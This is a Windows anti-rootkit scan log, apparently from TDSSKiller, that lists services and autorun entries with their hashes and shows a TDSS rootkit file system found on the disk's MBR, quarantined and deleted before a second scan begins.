13:16:50.0531 0x08d8  wdmaud - ok
13:16:50.0562 0x08d8  [ 77A354E28153AD2D5E120A5A8687BC06, 8B2D37A4443501C0A8E70BC2079BE27F0A36FD07B561E6F68B40A72EABBC2DFE ] WebClient       C:\WINDOWS\System32\webclnt.dll
13:16:50.0750 0x08d8  WebClient - ok
13:16:50.0812 0x08d8  [ 2D0E4ED081963804CCC196A0929275B5, E1D75C7D7233D81DFDE13160B0C80138DF8B35230D04FB79B367A52FACF69BF8 ] winmgmt         C:\WINDOWS\system32\wbem\WMIsvc.dll
13:16:50.0968 0x08d8  winmgmt - ok
13:16:51.0109 0x08d8  [ 5144AE67D60EC653F97DDF3FEED29E77, F6238767284B2356A9F502E2ACCFAAC283FA13CBF238E98B5115A55179526B10 ] wlidsvc         C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
13:16:51.0187 0x08d8  wlidsvc - ok
13:16:51.0218 0x08d8  [ C51B4A5C05A5475708E3C81C7765B71D, F776D2680BD3407307B7072626F78460361FC5BC38623C9E16F394D300AB25DE ] WmdmPmSN        C:\WINDOWS\system32\MsPMSNSv.dll
13:16:51.0296 0x08d8  WmdmPmSN - ok
13:16:51.0359 0x08d8  [ E76F8807070ED04E7408A86D6D3A6137, BFCF5361B7335760A7AE4B6958DE516A27AC60AA09135A46F0B49F588FAFE3A0 ] Wmi             C:\WINDOWS\System32\advapi32.dll
13:16:51.0421 0x08d8  Wmi - ok
13:16:51.0468 0x08d8  [ E0673F1106E62A68D2257E376079F821, 12992F18C9653050B10DC61D12988067933FCFDF02123D3A7EF5DE607A785DDC ] WmiApSrv        C:\WINDOWS\system32\wbem\wmiapsrv.exe
13:16:51.0640 0x08d8  WmiApSrv - ok
13:16:51.0734 0x08d8  [ F74E3D9A7FA9556C3BBB14D4E5E63D3B, C71FAAC752F6D58BF8556661252DBF8C5DDD090CAE002A2C7E09C9A014526066 ] WMPNetworkSvc   C:\Program Files\Windows Media Player\WMPNetwk.exe
13:16:51.0812 0x08d8  WMPNetworkSvc - ok
13:16:51.0828 0x08d8  [ CF4DEF1BF66F06964DC0D91844239104, CC1D9CECE2056D29A9651D51BB57C3F4F9BF9E90A4808CF7496C683C874FBD51 ] WpdUsb          C:\WINDOWS\system32\DRIVERS\wpdusb.sys
13:16:51.0859 0x08d8  WpdUsb - ok
13:16:51.0984 0x08d8  [ 15673BD0B86150CB8E27766059C72A9B, 56C23289A8BFF4945EE532CF6D62D3EC81B827CA15A359F30A327789F9FE9CAF ] WPFFontCache_v0400 C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
13:16:52.0031 0x08d8  WPFFontCache_v0400 - ok
13:16:52.0062 0x08d8  [ 6ABE6E225ADB5A751622A9CC3BC19CE8, 4061C5D0F051DFF1730E2A3BFC1CCA97B29602FC50F10F6B44D93B0D28F42024 ] WS2IFSL         C:\WINDOWS\System32\drivers\ws2ifsl.sys
13:16:52.0187 0x08d8  WS2IFSL - ok
13:16:52.0234 0x08d8  [ 7C278E6408D1DCE642230C0585A854D5, DA46079A04F6E8E3441E4AE454AEAC02B3E935DE29CE7F6D4476F57867FCC12A ] wscsvc          C:\WINDOWS\system32\wscsvc.dll
13:16:52.0421 0x08d8  wscsvc - ok
13:16:52.0453 0x08d8  [ 35321FB577CDC98CE3EB3A3EB9E4610A, C9A6F5CF282D8FCB3CDFCC4B306013480E78E1B664E1A60A4E27B161F9FFD4CD ] wuauserv        C:\WINDOWS\system32\wuauserv.dll
13:16:52.0593 0x08d8  wuauserv - ok
13:16:52.0625 0x08d8  [ F15FEAFFFBB3644CCC80C5DA584E6311, 79B3E9AF35976CE49921E9BEA3BA3B4A8AF762FD3F284B62954038B5FFB32471 ] WudfPf          C:\WINDOWS\system32\DRIVERS\WudfPf.sys
13:16:52.0671 0x08d8  WudfPf - ok
13:16:52.0687 0x08d8  [ 28B524262BCE6DE1F7EF9F510BA3985B, AEFF02B899801A63CBB262757C3D4369E38BFF0690BD085DE60E873DFBE3C3F4 ] WudfRd          C:\WINDOWS\system32\DRIVERS\wudfrd.sys
13:16:52.0718 0x08d8  WudfRd - ok
13:16:52.0750 0x08d8  [ 05231C04253C5BC30B26CBAAE680ED89, 5C03C2D7E0B573646D32F4093E2FF2C3BA391C39F5BA37D67F69D38E357FCC3D ] WudfSvc         C:\WINDOWS\System32\WUDFSvc.dll
13:16:52.0765 0x08d8  WudfSvc - ok
13:16:52.0828 0x08d8  [ 81DC3F549F44B1C1FFF022DEC9ECF30B, 3D14BFEA539F9CEB16555BD56C5E3C7C8F6692FC62C2789F8AAEA1C042E63940 ] WZCSVC          C:\WINDOWS\System32\wzcsvc.dll
13:16:53.0000 0x08d8  WZCSVC - ok
13:16:53.0031 0x08d8  [ 295D21F14C335B53CB8154E5B1F892B9, 9418477C2E3EA93E93D931A4EDD4500DA568FAD6040204B5201D1080203B0BBC ] xmlprov         C:\WINDOWS\System32\xmlprov.dll
13:16:53.0171 0x08d8  xmlprov - ok
13:16:53.0234 0x08d8  [ 518C4D4DCB93C88316303694163BBD63, 93865CC9AEFEF2DD0E8025EE283AC57773EF13D38E03B73FBCE22FAB9D77D2AE ] yukonwxp        C:\WINDOWS\system32\DRIVERS\yk51x86.sys
13:16:53.0281 0x08d8  yukonwxp - ok
13:16:53.0328 0x08d8  [ 478B4415DFB3A45B6FE61EC781E07D7B, C48BFA226F594E4BFB722056C8EF9CCBB27504F181781284AE7151D2CDAF50DE ] ZD1211BU(ZyDAS) C:\WINDOWS\system32\DRIVERS\zd1211Bu.sys
13:16:53.0390 0x08d8  ZD1211BU(ZyDAS) - ok
13:16:53.0421 0x08d8  [ 3C185892DD5C13975966E8D1C2A65290, 665A4B5AC61A76A6E72B6C87ECE902617E8A03DD1E63418CF15EA988FDBD5B44 ] ZD1211U(ZyDAS)  C:\WINDOWS\system32\DRIVERS\zd1211u.sys
13:16:53.0468 0x08d8  ZD1211U(ZyDAS) - ok
13:16:53.0500 0x08d8  [ 00AE175B903D45ED4A62384D3315DC2A, FAAAD00B96DDCDEB396D479F89207A0EEC374871C6340AACDDB95BF289D6330C ] ZDPSp50         C:\WINDOWS\system32\Drivers\ZDPSp50.sys
13:16:53.0500 0x08d8  ZDPSp50 - detected UnsignedFile.Multi.Generic ( 1 )
13:16:56.0000 0x08d8  Detect skipped due to KSN trusted
13:16:56.0000 0x08d8  ZDPSp50 - ok
13:16:56.0015 0x08d8  ================ Scan global ===============================
13:16:56.0046 0x08d8  [ 42F1F4C0AFB08410E5F02D4B13EBB623, 924C30587C51C0D1E1F47991969AF492A644552E15F2480EA991DCB74A3E68D5 ] C:\WINDOWS\system32\basesrv.dll
13:16:56.0093 0x08d8  [ 69AE2B2E6968C316536E5B10B9702E63, D9C5DA7A20DDE69D91E72400C3F06F3CB099DEF42EA6C53FCE076258A0C22391 ] C:\WINDOWS\system32\winsrv.dll
13:16:56.0125 0x08d8  [ 69AE2B2E6968C316536E5B10B9702E63, D9C5DA7A20DDE69D91E72400C3F06F3CB099DEF42EA6C53FCE076258A0C22391 ] C:\WINDOWS\system32\winsrv.dll
13:16:56.0140 0x08d8  [ 65DF52F5B8B6E9BBD183505225C37315, 59C606977DB40A3443DFF0BE2A4C761824881B22C9FDB3D23F6486DB580E92A4 ] C:\WINDOWS\system32\services.exe
13:16:56.0140 0x08d8  [ Global ] - ok
13:16:56.0156 0x08d8  ================ Scan MBR ==================================
13:16:56.0171 0x08d8  [ 99852D5C3A78447C3D6D82B6155FE848 ] \Device\Harddisk0\DR0
13:16:59.0046 0x08d8  \Device\Harddisk0\DR0 - detected TDSS File System ( 1 )
13:16:59.0046 0x08d8  \Device\Harddisk0\DR0 ( TDSS File System ) - warning
13:17:01.0625 0x08d8  ================ Scan VBR ==================================
13:17:01.0625 0x08d8  [ BA29F0665A0180B8388AD44A01EA69CE ] \Device\Harddisk0\DR0\Partition1
13:17:01.0640 0x08d8  \Device\Harddisk0\DR0\Partition1 - ok
13:17:01.0656 0x08d8  [ EF7C7D20C938BDEB2E5C23C206B5B61F ] \Device\Harddisk0\DR0\Partition2
13:17:01.0656 0x08d8  \Device\Harddisk0\DR0\Partition2 - ok
13:17:01.0656 0x08d8  ================ Scan generic autorun ======================
13:17:01.0671 0x08d8  LaunchApp - ok
13:17:02.0359 0x08d8  [ 1674E54E4AB3D492C648AA43F731A540, D140986EB98342D75E693F0D05ADAB672DF9553593A97B9455C6407142672B41 ] C:\WINDOWS\RTHDCPL.EXE
13:17:04.0156 0x08d8  RTHDCPL - ok
13:17:04.0359 0x08d8  [ C74B86642F131D76C0EDE673FDF137B2, 91659969CF94979FA980A3C13AB3E7421048E4E2720DE6064E9B61FD4DF96666 ] C:\WINDOWS\SkyTel.EXE
13:17:04.0515 0x08d8  SkyTel - ok
13:17:04.0578 0x08d8  [ 27ECDC43B2E41A865092CC31263358F2, 3956B6E4EC45C37D47E9FF7382984B806691B9407E59A6377C51B05E5A6BE83D ] c:\Program Files\NewTech Infosystems\NTI CD & DVD-Maker 7\ntiMUI.exe
13:17:04.0593 0x08d8  ntiMUI - detected UnsignedFile.Multi.Generic ( 1 )
13:17:07.0156 0x08d8  Detect skipped due to KSN trusted
13:17:07.0156 0x08d8  ntiMUI - ok
13:17:07.0187 0x08d8  [ 8FB740D758B14B1BC950CC347C21E461, 6EAB429DE35D87C94E9B912E189C248428653674939352E0210FC026F5A4B564 ] C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
13:17:07.0218 0x08d8  RemoteControl - detected UnsignedFile.Multi.Generic ( 1 )
13:17:09.0953 0x08d8  Detect skipped due to KSN trusted
13:17:09.0953 0x08d8  RemoteControl - ok
13:17:10.0000 0x08d8  [ 7BBE4CF421AECC7F0226EDD75F12079F, 8E78FC5E0657DB066F9EBAADEA9AFECB1AAA570DD9C08C7ED42116704D2E379D ] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE
13:17:10.0156 0x08d8  IMJPMIG8.1 - ok
13:17:10.0187 0x08d8  [ E6BB63BBE1BED01769CA87F4DAC286C8, 6D1D7C7365FBF29C92398BC11D5713BC373E372D92C155DA0DBA3B86DD1705F7 ] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE
13:17:10.0328 0x08d8  IMEKRMIG6.1 - ok
13:17:10.0359 0x08d8  [ 1B17E09C1223F6D17336D2DD7A1AF4F4, 06DFAD95007532CCF46D593EEDC2474936614AEDCEA7BF983E36DAD22F850B08 ] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe
13:17:10.0500 0x08d8  MSPY2002 - ok
13:17:10.0531 0x08d8  [ 024DC0F68DF5FD6AE9DD82DFBAF479D6, FDBF0FD05CFB757C704B22703DF23E05207F14877A4EF52E3032012B6FD0C4E0 ] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE
13:17:10.0671 0x08d8  PHIME2002ASync - ok
13:17:10.0703 0x08d8  [ 024DC0F68DF5FD6AE9DD82DFBAF479D6, FDBF0FD05CFB757C704B22703DF23E05207F14877A4EF52E3032012B6FD0C4E0 ] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE
13:17:10.0828 0x08d8  PHIME2002A - ok
13:17:10.0859 0x08d8  [ 3F5B5C05BA8002D171B482066CEDFE75, DDAC7B13387AC6729136315A30467FF6B3D94CF71CF91E7D53B70660028B0782 ] C:\WINDOWS\system32\igfxtray.exe
13:17:10.0890 0x08d8  IgfxTray - ok
13:17:10.0906 0x08d8  [ 71E7AC7708BDFF5FFA0FA33D38220195, F11CF440DFBC1573FA05959B3F727CE1AF721DC98333996BB777FC7CEB166FF9 ] C:\WINDOWS\system32\hkcmd.exe
13:17:10.0937 0x08d8  HotKeysCmds - ok
13:17:10.0953 0x08d8  [ 63678F54E6EFB60010C073E3979080E9, 7403D83F99F9F8F77BDF9FC925F48BCD407860BF11FED8872F9F9B42BB531B8C ] C:\WINDOWS\system32\igfxpers.exe
13:17:10.0984 0x08d8  Persistence - ok
13:17:11.0062 0x08d8  [ 72D78BD9AB1F457502F01832B07133CF, 28B63273420234F4349E23DCEDC5F80E9BAB307C08F39016E92DA7BCA411955E ] C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe
13:17:11.0078 0x08d8  eDataSecurity Loader - detected UnsignedFile.Multi.Generic ( 1 )
13:17:13.0812 0x08d8  Detect skipped due to KSN trusted
13:17:13.0812 0x08d8  eDataSecurity Loader - ok
13:17:13.0859 0x08d8  [ C67E00C1DCA52FB369DC54E9EE653D47, 5D6C19CFFCB221FEFA60870E1520DF035DD4433D0B5DEC505EBBC01D5EE6AD0D ] C:\Acer\Empowering Technology\eRecovery\eRAgent.exe
13:17:13.0906 0x08d8  eRecoveryService - detected UnsignedFile.Multi.Generic ( 1 )
13:17:16.0406 0x08d8  Detect skipped due to KSN trusted
13:17:16.0406 0x08d8  eRecoveryService - ok
13:17:16.0484 0x08d8  [ 2E73DF74A297EE6B91C4F57B9BD84317, 6B8BC16820071A7F54228792E075730E2E17043530CB62DCD2BCCC86D6011D29 ] C:\Program Files\Qwest\QuickCare\bin\sprtcmd.exe
13:17:16.0484 0x08d8  Suspicious file ( NoAccess ): C:\Program Files\Qwest\QuickCare\bin\sprtcmd.exe. md5: 2E73DF74A297EE6B91C4F57B9BD84317, sha256: 6B8BC16820071A7F54228792E075730E2E17043530CB62DCD2BCCC86D6011D29
13:17:16.0484 0x08d8  QuickCare2.2 - detected LockedFile.Multi.Generic ( 1 )
13:17:18.0984 0x08d8  Detect skipped due to KSN trusted
13:17:18.0984 0x08d8  QuickCare2.2 - ok
13:17:19.0046 0x08d8  [ D5E719C1ED306EC0E65E2E71638CC40A, 102AB96AD06F62BA110568F0E5179AB7D5D1B0AE4DA4A3549F64CFA9DE5FD2A4 ] C:\Program Files\Amazon\Amazon Games & Software Downloader\AmazonGSDownloaderTray.exe
13:17:19.0062 0x08d8  AmazonGSDownloaderTray - detected UnsignedFile.Multi.Generic ( 1 )
13:17:21.0562 0x08d8  Detect skipped due to KSN trusted
13:17:21.0562 0x08d8  AmazonGSDownloaderTray - ok
13:17:21.0625 0x08d8  [ D2DAD71C96C113ED07F7BB79AD831C28, 8EACE797C16663D58B8BA67C9BF135780D1676E16797A1E81706263238C7BC0B ] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe
13:17:21.0640 0x08d8  APSDaemon - ok
13:17:21.0703 0x08d8  [ 4AFFDCAADCB1DBBFFAF06C7F82E7F6FC, 8BAD14D327C60B4CBC00278802A5F6453D641EFC2EF97D90E7AB579758DF7FFC ] C:\Program Files\iTunes\iTunesHelper.exe
13:17:21.0734 0x08d8  iTunesHelper - ok
13:17:21.0781 0x08d8  [ 8DDA2B606279753601F9415DA503CA63, 2C9AD8218E150B6D50817991377ED3230A1672EFBD7AE29D0CD9E55E2418C800 ] C:\Program Files\QuickTime\QTTask.exe
13:17:21.0812 0x08d8  QuickTime Task - detected UnsignedFile.Multi.Generic ( 1 )
13:17:24.0625 0x08d8  Detect skipped due to KSN trusted
13:17:24.0625 0x08d8  QuickTime Task - ok
13:17:24.0718 0x08d8  [ 048EA4B978851788E9F5E8E4F081DF7A, EB62719AC0DCC18FF056F2CD84438BF14B61E38F0619617C81961C6257BDFCEC ] C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
13:17:24.0781 0x08d8  Adobe ARM - ok
13:17:24.0812 0x08d8  [ D63797E8E7781EE1500A810CB6194FA6, 5C96DA00B98F0776E6174EBB7D4D6DB634838E130D8581E11811831D2C57B119 ] C:\Program Files\Common Files\Java\Java Update\jusched.exe
13:17:24.0843 0x08d8  SunJavaUpdateSched - ok
13:17:24.0906 0x08d8  [ CE5C9977DA751DDC30952AC4DCBCA788, 295172C4681E9AC27121122CDD2BA6F2A62435917A083CC8490D584CA0164BE6 ] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
13:17:24.0921 0x08d8  HP Software Update - ok
13:17:24.0921 0x08d8  Malwarebytes Anti-Malware (reboot) - ok
13:17:25.0171 0x08d8  [ 6DB4CC46B84D49F675D89BFB0A8CAFC3, 01019410A8AD79AEA059CC31E420E862C180F9A35832B7F396421D07708EC94F ] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
13:17:25.0171 0x08d8  Suspicious file ( NoAccess ): C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe. md5: 6DB4CC46B84D49F675D89BFB0A8CAFC3, sha256: 01019410A8AD79AEA059CC31E420E862C180F9A35832B7F396421D07708EC94F
13:17:25.0171 0x08d8  SUPERAntiSpyware - detected LockedFile.Multi.Generic ( 1 )
13:17:27.0671 0x08d8  Detect skipped due to KSN trusted
13:17:27.0671 0x08d8  SUPERAntiSpyware - ok
13:17:27.0828 0x08d8  [ 1018DE129F3A1D28654FD801D3FCA4E1, 78E913ACF8024F0B75CFF151162F83318BEDBBD43E390A32532E6EF94DA6C3AF ] C:\Documents and Settings\Jay\Application Data\Spotify\Data\SpotifyWebHelper.exe
13:17:27.0890 0x08d8  Spotify Web Helper - ok
13:17:27.0937 0x08d8  [ 5F1D5F88303D4A4DBC8E5F97BA967CC3, 5FB24FC7916A6E6B3BE7D84CB1684215B266CD1495575C2E5672B8447932E5B1 ] C:\WINDOWS\system32\ctfmon.exe
13:17:28.0109 0x08d8  ctfmon.exe - ok
13:17:28.0171 0x08d8  swg - ok
13:17:28.0171 0x08d8  [ 5F1D5F88303D4A4DBC8E5F97BA967CC3, 5FB24FC7916A6E6B3BE7D84CB1684215B266CD1495575C2E5672B8447932E5B1 ] C:\WINDOWS\system32\ctfmon.exe
13:17:28.0296 0x08d8  ctfmon.exe - ok
13:17:28.0421 0x08d8  [ 3E930C641079443D4DE036167A69CAA2, DEBA83978850F17B33A3C4C06C5E707B9A3FACA30FE0DFC5A9425EF2CA592473 ] C:\Program Files\Messenger\msmsgs.exe
13:17:28.0640 0x08d8  MSMSGS - ok
13:17:28.0656 0x08d8  [ 5F1D5F88303D4A4DBC8E5F97BA967CC3, 5FB24FC7916A6E6B3BE7D84CB1684215B266CD1495575C2E5672B8447932E5B1 ] C:\WINDOWS\system32\ctfmon.exe
13:17:28.0796 0x08d8  ctfmon.exe - ok
13:17:28.0796 0x08d8  swg - ok
13:17:28.0796 0x08d8  Waiting for KSN requests completion. In queue: 8
13:17:29.0796 0x08d8  Waiting for KSN requests completion. In queue: 8
13:17:30.0796 0x08d8  Waiting for KSN requests completion. In queue: 8
13:17:32.0062 0x08d8  Win FW state via NFM: disabled
13:17:34.0640 0x08d8  ============================================================
13:17:34.0640 0x08d8  Scan finished
13:17:34.0640 0x08d8  ============================================================
13:17:34.0640 0x0aec  Detected object count: 1
13:17:34.0640 0x0aec  Actual detected object count: 1
13:17:52.0000 0x0aec  \Device\Harddisk0\DR0\TDLFS\config.ini - copied to quarantine
13:17:52.0031 0x0aec  \Device\Harddisk0\DR0\TDLFS\tdl - copied to quarantine
13:17:52.0031 0x0aec  \Device\Harddisk0\DR0\TDLFS\rsrc.dat - copied to quarantine
13:17:52.0046 0x0aec  \Device\Harddisk0\DR0\TDLFS\tdlcmd.dll - copied to quarantine
13:17:52.0046 0x0aec  \Device\Harddisk0\DR0\TDLFS - deleted
13:17:52.0046 0x0aec  \Device\Harddisk0\DR0 ( TDSS File System ) - User select action: Delete
13:18:09.0140 0x020c  ============================================================
13:18:09.0140 0x020c  Scan started
13:18:09.0140 0x020c  Mode: Manual; SigCheck; TDLFS;
13:18:09.0140 0x020c  ============================================================
13:18:09.0140 0x020c  KSN ping started
13:18:11.0687 0x020c  KSN ping finished: true
13:18:12.0125 0x020c  ================ Scan system memory ========================
13:18:12.0125 0x020c  System memory - ok
13:18:12.0125 0x020c  ================ Scan services =============================
13:18:12.0218 0x020c  [ C0393EB99A6C72C6BEF9BFC4A72B33A6, 72BF029C6A37DE131FFD61C2374C8920556236218613E37B5F348AA89FA12E42 ] !SASCORE        C:\Program Files\SUPERAntiSpyware\SASCORE.EXE
13:18:12.0250 0x020c  !SASCORE - detected UnsignedFile.Multi.Generic ( 1 )
13:18:12.0250 0x020c  Detect skipped due to KSN trusted
13:18:12.0250 0x020c  !SASCORE - ok
13:18:12.0375 0x020c  Abiosdsk - ok
13:18:12.0375 0x020c  abp480n5 - ok
13:18:12.0421 0x020c  [ 8FD99680A539792A30E97944FDAECF17, 594F8E0C3695400B0C09A797AF6BDFAC6F750ECD67D0EE803914C572B1DCC43C ] ACPI            C:\WINDOWS\system32\DRIVERS\ACPI.sys
13:18:12.0593 0x020c  ACPI - ok
13:18:12.0609 0x020c  [ 9859C0F6936E723E4892D7141B1327D5, 5E8F6A2FC4DF2E5E92A1D66ECC2810E08B42B64E9CD0DF4AD3F78EA8558B90AF ] ACPIEC          C:\WINDOWS\system32\drivers\ACPIEC.sys
13:18:12.0750 0x020c  ACPIEC - ok
13:18:12.0812 0x020c  [ FBB312C9DA3863673EC18F4AE4101778, 4E9AAE7C700E485C17FDFCC9100A79784673B006D00D4D4CE8F1DB617D25C864 ] AdobeFlashPlayerUpdateSvc C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
13:18:12.0828 0x020c  AdobeFlashPlayerUpdateSvc - ok
13:18:12.0843 0x020c  adpu160m - ok
13:18:12.0890 0x020c  [ 8BED39E3C35D6A489438B8141717A557, 1B5796E56B0927360CE0759641B1151828BC0A9E45620D2B2D880491F5CE33D0 ] aec             C:\WINDOWS\system32\drivers\aec.sys
13:18:13.0031 0x020c  aec - ok
13:18:13.0078 0x020c  [ 1E44BC1E83D8FD2305F8D452DB109CF9, CF5EC07E0B589FA2A4701C6CFD69E893FC3ABF274AD57AE3C13FFE49063B02C8 ] AFD             C:\WINDOWS\System32\drivers\afd.sys
13:18:13.0109 0x020c  AFD - ok
13:18:13.0109 0x020c  Aha154x - ok
13:18:13.0125 0x020c  aic78u2 - ok
13:18:13.0125 0x020c  aic78xx - ok
13:18:13.0156 0x020c  [ A9A3DAA780CA6C9671A19D52456705B4, 67C959144B57AE0BBF1D82DBED197F32CDB06FECD883A80C441A0202FE83FAB4 ] Alerter         C:\WINDOWS\system32\alrsvc.dll
13:18:13.0296 0x020c  Alerter - ok
13:18:13.0328 0x020c  [ 8C515081584A38AA007909CD02020B3D, A5E13CA10F702928E0DE84C74D0EA8ACCB117FD76FBABC55220C75C4FFD596DC ] ALG             C:\WINDOWS\System32\alg.exe
13:18:13.0468 0x020c  ALG - ok
13:18:13.0468 0x020c  AliIde - ok
13:18:13.0484 0x020c  amsint - ok
13:18:13.0562 0x020c  [ A5299D04ED225D64CF07A568A3E1BF8C, 6F7E73893127BADC8C9815E9BCC0EB5F6584E254D0D09A0B6A680704C71E0A90 ] Apple Mobile Device C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
13:18:13.0578 0x020c  Apple Mobile Device - ok
13:18:13.0625 0x020c  [ D8849F77C0B66226335A59D26CB4EDC6, 4990031453204C57E36E850252A39B05D6ECDAB9E71A8136FB4900F17E59C9CA ] AppMgmt         C:\WINDOWS\System32\appmgmts.dll
13:18:13.0765 0x020c  AppMgmt - ok
13:18:13.0796 0x020c  [ B5B8A80875C1DEDEDA8B02765642C32F, AD0C71D73B1B8225351FBF4FFB43001A32B4DAE69504C59970CD2428BB33D4EF ] Arp1394         C:\WINDOWS\system32\DRIVERS\arp1394.sys
13:18:13.0937 0x020c  Arp1394 - ok
13:18:13.0953 0x020c  asc - ok
13:18:13.0953 0x020c  asc3350p - ok
13:18:13.0968 0x020c  asc3550 - ok
13:18:14.0046 0x020c  [ 0E5E4957549056E2BF2C49F4F6B601AD, F7F19FDC906B719A3516D30A9B4A2262C8CC5B36B94E3D4195C345EC4610FF2B ] aspnet_state    C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
13:18:14.0062 0x020c  aspnet_state - ok
13:18:14.0078 0x020c  [ B153AFFAC761E7F5FCFA822B9C4E97BC, 7E60F572A6B3C6219E3C86225AA37243AFFD74337DB7F108B04778042E5CC959 ] AsyncMac        C:\WINDOWS\system32\DRIVERS\asyncmac.sys
13:18:14.0250 0x020c  AsyncMac - ok
13:18:14.0296 0x020c  [ 9F3A2F5AA6875C72BF062C712CFA2674, B4DF1D2C56A593C6B54DE57395E3B51D288F547842893B32B0F59228A0CF70B9 ] atapi           C:\WINDOWS\system32\DRIVERS\atapi.sys
13:18:14.0421 0x020c  atapi - ok
13:18:14.0437 0x020c  Atdisk - ok
13:18:14.0453 0x020c  [ 9916C1225104BA14794209CFA8012159, 5D6F05F715C52A16D05CAE15C3DFE77A139A7F27F7AE710EC9A10F9EE05115A1 ] Atmarpc         C:\WINDOWS\system32\DRIVERS\atmarpc.sys
13:18:14.0578 0x020c  Atmarpc - ok
13:18:14.0625 0x020c  [ DEF7A7882BEC100FE0B2CE2549188F9D, 462C95B63D0A1058291A2DC8CBFCB13D7D74CCD1CA43B613A7EB43D49E3276F8 ] AudioSrv        C:\WINDOWS\System32\audiosrv.dll
13:18:14.0750 0x020c  AudioSrv - ok
13:18:14.0781 0x020c  [ D9F724AA26C010A217C97606B160ED68, 329B5118F2409731D06FDAE85B6ADD64A048292801BCB3546651CEB303111695 ] audstub         C:\WINDOWS\system32\DRIVERS\audstub.sys
13:18:14.0921 0x020c  audstub - ok
13:18:14.0984 0x020c  [ A2494901E7226B356B8C1005C45F1C5F, A4A7076D40B012BB415C4B661B8C45671B853330746E278D080EC96596EEECBE ] BBSvc           C:\Program Files\Microsoft\BingBar\7.1.361.0\BBSvc.exe
13:18:15.0015 0x020c  BBSvc - ok
13:18:15.0031 0x020c  [ 63B1CBBAE4790B5BAC98F01BF9449722, 0A49B9FCEF33B38132B0AB8A9D7591A46856E82BC2123841E27A895817D92695 ] BBUpdate        C:\Program Files\Microsoft\BingBar\7.1.361.0\SeaPort.exe
13:18:15.0062 0x020c  BBUpdate - ok
13:18:15.0078 0x020c  [ DA1F27D85E0D1525F6621372E7B685E9, 5A81A46A3BDD19DAFC6C87D277267A5D44F3A1B5302F2CC1111D84B7BAD5610D ] Beep            C:\WINDOWS\system32\drivers\Beep.sys
13:18:15.0218 0x020c  Beep - ok
13:18:15.0265 0x020c  [ 574738F61FCA2935F5265DC4E5691314, 3C7CCF064397186C3A3863DD2370AB6414A61B330097DCA4F299CA7BBAA3D1B4 ] BITS            C:\WINDOWS\system32\qmgr.dll
13:18:15.0437 0x020c  BITS - ok
13:18:15.0500 0x020c  [ DB5BEA73EDAF19AC68B2C0FAD0F92B1A, 10F21999FF6B1D410EBF280F7F27DEACA5289739CF12F4293B614B8FC6C88DCC ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
13:18:15.0531 0x020c  Bonjour Service - ok
13:18:15.0578 0x020c  [ CFD4E51402DA9838B5A04AE680AF54A0, 5378F42B195B5832B00A05AD64E00473A45FFB86AC25C57241F26EA82B149FE1 ] Browser         C:\WINDOWS\System32\browser.dll
13:18:15.0609 0x020c  Browser - ok
13:18:15.0640 0x020c  [ 90A673FC8E12A79AFBED2576F6A7AAF9, BDE7858A3457DB979FEDD8577FA6321BF72848E4A7BF9F173C78A6A10CBB3EBE ] cbidf2k         C:\WINDOWS\system32\drivers\cbidf2k.sys
13:18:15.0812 0x020c  cbidf2k - ok
13:18:15.0812 0x020c  cd20xrnt - ok
13:18:15.0828 0x020c  [ C1B486A7658353D33A10CC15211A873B, AA4DD9E7AAE5AAB1146B360B17001F975D2F29A1281CF7B13E7136480410F347 ] Cdaudio         C:\WINDOWS\system32\drivers\Cdaudio.sys
13:18:15.0968 0x020c  Cdaudio - ok
13:18:15.0984 0x020c  [ C885B02847F5D2FD45A24E219ED93B32, B26B2F8E3A831E2B65EB0C5195B0645CD50E22615CE79C9B0B391CD563B121DB ] Cdfs            C:\WINDOWS\system32\drivers\Cdfs.sys
13:18:16.0125 0x020c  Cdfs - ok
13:18:16.0140 0x020c  [ 1F4260CC5B42272D71F79E570A27A4FE, B51C2A3ED3C309953D0EA45869C8E464C10F2533DADE9E0286AF674979098D1D ] Cdrom           C:\WINDOWS\system32\DRIVERS\cdrom.sys
13:18:16.0281 0x020c  Cdrom - ok
13:18:16.0312 0x020c  [ 1CFE720EB8D93A7158A4EBC3AB178BDE, 65D2A9D9A88F38D4AF323134C151BA0F4B3CD0F6A134AF86E7AC9D07319F1726 ] CiSvc           C:\WINDOWS\system32\cisvc.exe
13:18:16.0453 0x020c  CiSvc - ok
13:18:16.0468 0x020c  [ 34CBE729F38138217F9C80212A2A0C82, A9FD7A758D12E0818A11BEEF1CE772FEFA8373E92EF6C0DA8628CD4572CC9A43 ] ClipSrv         C:\WINDOWS\system32\clipsrv.exe
13:18:16.0609 0x020c  ClipSrv - ok
13:18:16.0656 0x020c  [ D87ACAED61E417BBA546CED5E7E36D9C, 14AC6034A5BC0FB2A1AFDAD42BEF4DE641556E54AD30D0C46765660A4BE55462 ] clr_optimization_v2.0.50727_32 C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
13:18:16.0671 0x020c  clr_optimization_v2.0.50727_32 - ok
13:18:16.0734 0x020c  [ C5A75EB48E2344ABDC162BDA79E16841, 6070A8AAFD38FBC6A68A2B10C20117612354DF21B4492D90CA522BFB6870D726 ] clr_optimization_v4.0.30319_32 C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
13:18:16.0750 0x020c  clr_optimization_v4.0.30319_32 - ok
13:18:16.0750 0x020c  CmdIde - ok
13:18:16.0765 0x020c  COMSysApp - ok
13:18:16.0781 0x020c  Cpqarray - ok
